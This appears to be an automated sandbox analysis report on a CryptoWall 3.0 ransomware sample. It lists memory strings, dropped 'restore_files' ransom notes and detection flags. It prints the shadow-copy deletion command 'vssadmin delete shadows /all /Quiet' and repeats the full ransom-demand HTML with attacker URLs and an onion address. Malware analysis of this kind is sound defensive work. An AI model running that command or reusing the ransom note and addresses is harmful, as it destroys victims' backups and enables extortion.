Source: svcmtr.exe, 00000002.00000003.351667117.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
Source: svcmtr.exe, 00000002.00000003.351667117.00000000006DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hWindows\System32\vssadmin.exe" delete shadows /all /Quiet ZZ
Source: vssadmin.exe, 00000006.00000002.354667398.0000000000374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w7Bw7Pw7`w7jw7C:\Windows\System32\vssadmin.exedeleteshadows/all/Quieti
Source: vssadmin.exe, 00000006.00000002.354605514.00000000001F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
Source: vssadmin.exe, 00000006.00000002.354605514.00000000001F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: vssadmin.exe, 00000006.00000002.354605514.00000000001F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet 0
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Drops a file containing file decryption instructions (likely related to ransomware)
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1003\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1003\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1004\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1004\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1005\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1005\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1006\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1006\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\$Recycle.Bin\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Config.Msi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Config.Msi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\restore_files_gpmus.htmlJump to behavior
Found potential ransomware demand text
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these 